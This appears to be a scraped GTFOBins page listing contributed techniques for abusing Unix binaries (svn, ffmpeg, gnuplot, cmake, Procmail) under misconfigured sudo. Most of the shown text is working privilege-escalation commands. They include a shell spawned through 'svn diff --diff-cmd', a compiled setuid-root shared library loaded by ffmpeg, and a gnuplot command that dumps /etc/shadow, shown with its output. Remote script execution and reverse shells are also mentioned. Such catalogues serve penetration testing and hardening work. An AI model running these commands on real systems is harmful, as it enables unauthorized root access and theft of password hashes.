GTFOBins.github.io
GTFOBins.github.io copied to clipboard
GTFOBins
GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems
Reference: https://www.shielder.com/blog/2024/09/a-journey-from-sudo-iptables-to-local-privilege-escalation/
Added an entry for the 'cmake' binary, which is commonly used by developers and for creating projects from source.
I stumbled upon a way to copy a file (ASCII script, it does not work as well with binaries) from a remote server and execute it without ever creating anything...
This new GTFOBin is not as common on some systems, but there may be occasions where it is present. The Procmail configuration file will allow us to execute reverse shells,...
``` lowpriv@7dc99421ba84:/tmp/working$ TD=$(mktemp -d) svnadmin create $TD/pwn svn checkout file:///$TD/pwn $TD/project echo -e '#!/bin/bash\n/bin/sh' > $TD/shell chmod +x $TD/shell sudo svn diff --diff-cmd "$TD/shell" Checked out revision 0. Index: c...
``` lowpriv@7dc99421ba84:/tmp$ TD=$(mktemp -d) printf "\x52\x49\x46\x46\x24\x00\x00\x00\x57\x41\x56\x45\x66\x6d\x74\x20\x10\x00\x00\x00\x01\x00\x01\x00\x22\x56\x00\x00\x22\x56\x00\x00\x01\x00\x08\x00\x64\x61\x74\x61\x00\x00\x00\x00" > "$TD/any.wav" echo -e '#include \n#include \n__attribute__((constructor)) static void setup(void) {\nsetgid(0);\nsetuid(0);\nsystem("/bin/sh -c reset");\nsystem("/bin/sh");\n}' | gcc -x c -shared -fPIC -o $TD/libgtfo.so - sudo ffmpeg...
``` lowpriv@7dc99421ba84:/tmp$ LFILE=/etc/shadow lowpriv@7dc99421ba84:/tmp$ sudo gnuplot -e 'set print "-" ; print system("cat '$LFILE'")' root:*:20007:0:99999:7::: daemon:*:20007:0:99999:7::: bin:*:20007:0:99999:7::: sys:*:20007:0:99999:7::: sync:*:20007:0:99999:7::: games:*:20007:0:99999:7::: man:*:20007:0:99999:7::: lp:*:20007:0:99999:7::: mail:*:20007:0:99999:7::: news:*:20007:0:99999:7::: uucp:*:20007:0:99999:7::: proxy:*:20007:0:99999:7::: www-data:*:20007:0:99999:7::: backup:*:20007:0:99999:7::: list:*:20007:0:99999:7::: irc:*:20007:0:99999:7:::...